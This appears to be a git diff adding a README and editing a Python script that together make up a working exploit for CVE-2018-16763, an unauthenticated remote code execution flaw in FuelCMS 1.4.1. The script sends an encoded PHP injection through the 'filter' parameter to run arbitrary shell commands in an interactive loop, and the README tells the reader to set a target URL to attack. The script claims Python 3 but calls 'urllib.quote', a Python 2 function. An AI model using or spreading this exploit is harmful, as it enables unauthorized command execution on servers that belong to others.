diff --git a/README.md b/README.md
new file mode 100644
index 0000000..bebb244
--- /dev/null
+++ b/README.md
@@ -0,0 +1,9 @@
+# CVE-2018-16763
+
+## FuelCMS 1.4.1 Remote Code Execution Vulnerability
+
+This is a port to Python 3 of the vulnerability at https://www.exploit-db.com/exploits/47138, created by 0xd0ff9.
+
+To run de exploit, just modify the *url* variable in the code with the target url you want to attack, and add the proxies you are behind to the *proxies* list.
+
+This exploit doesn't require any kind of authentication.
\ No newline at end of file
diff --git a/exploit.py b/exploit.py
index d54610d..0d30c6f 100644
--- a/exploit.py
+++ b/exploit.py
@@ -18,11 +18,11 @@ import requests import urllib url = "http://x.x.x.x:port" # Change this to the target URL +proxy = {"http" : "http://127.0.0.1:8080"} # Proxies you are behind (example is a burp url) while 1: command = input("$: ") exploit_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(command)+"%27%29%2b%27" - proxy = {"http" : "http://127.0.0.1:8080"} # List of the proxies you are behind r = requests.get(exploit_url, proxies=proxy) print(r.text[r.text.find("system")+6:r.text.find("